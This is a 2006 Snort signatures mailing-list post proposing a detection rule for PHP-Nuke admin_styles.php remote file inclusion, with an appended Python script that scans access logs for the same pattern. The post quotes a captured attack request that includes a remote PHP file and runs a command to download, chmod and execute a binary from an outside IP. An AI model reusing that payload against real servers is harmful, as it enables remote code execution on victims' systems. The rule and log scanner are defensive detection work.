[Snort-sigs] new rule for detect PHP-Nuke admin_styles.php phpbb_root_path access

rmkml rmkml at ...324...
Mon Jan 2 06:45:02 EST 2006


Hi,

Please check and maybe add this new rule:

web-php.rules:alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-PHP PHP-Nuke admin_styles.php phpbb_root_path access"; flow:to_server,established; content:"GET"; nocase; depth:3; uricontent:"/modules/Forums/admin/admin_styles.php"; nocase; uricontent:"phpbb_root_path|3D|"; nocase; reference:osvdb,16244; classtype:web-application-attack; )

I created this rule because I received this request:
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|............

This URL is strange, because the phpbb_root_path param looks like phpBB,
but the admin_styles.php file is PHP-Nuke ...
and I did not find a CVE ID with phpbb and admin_styles.

Improvements/comments are welcome.

Regards
Rmkml
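
Added example, not part of the original post: a log-hunting counterpart to the rule above, applying the same three conditions (GET, the admin_styles.php path, the phpbb_root_path= parameter, all case-insensitive) to web server access logs. It goes one step beyond the rule by marking hits whose parameter value is a remote URL; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# The same two URI strings the rule's uricontent options look for (nocase).
PATH = "/modules/forums/admin/admin_styles.php"
PARAM = "phpbb_root_path="

# Request line inside a combined-format access log entry: "METHOD URI HTTP/x.y"
REQUEST_RE = re.compile(r'"([A-Za-z]+) (\S+) HTTP/[\d.]+"')
# A parameter value that names a remote resource, as in the request quoted above.
REMOTE_RE = re.compile(r"phpbb_root_path=(?:https?|ftp)://", re.IGNORECASE)


def match_line(line):
    """Return None if the rule's conditions are not met, else a dict for the hit."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    method, raw_uri = m.group(1), m.group(2)
    # Decode percent-escapes first so %3D-style variants still match. This only
    # approximates the URI normalization Snort applies before uricontent.
    uri = unquote(raw_uri)
    lowered = uri.lower()
    if method.upper() != "GET" or PATH not in lowered or PARAM not in lowered:
        return None
    return {
        "client": line.split(" ", 1)[0],
        "uri": uri,
        "remote_include": bool(REMOTE_RE.search(uri)),
    }


def scan(lines):
    """Return the hits for every log line that satisfies the rule's conditions."""
    return [hit for hit in map(match_line, lines) if hit]


# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jan/2006:06:40:11 -0500] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://example.invalid/cmd.dat? HTTP/1.0" 404 291',
    '192.0.2.11 - - [02/Jan/2006:06:41:02 -0500] "GET /MODULES/Forums/admin/ADMIN_STYLES.PHP?phpbb_root_path%3Dincludes/ HTTP/1.1" 200 512',
    '192.0.2.12 - - [02/Jan/2006:06:42:30 -0500] "GET /modules/Forums/admin/admin_styles.php?mode=edit HTTP/1.1" 200 2048',
    '192.0.2.13 - - [02/Jan/2006:06:43:05 -0500] "GET /index.php?phpbb_root_path=http://example.invalid/x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], "remote_include=%s" % hit["remote_include"], hit["uri"])
```

The second sample line matches the rule's conditions without a remote value, which is the kind of hit worth separating from remote-inclusion attempts when triaging alerts.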



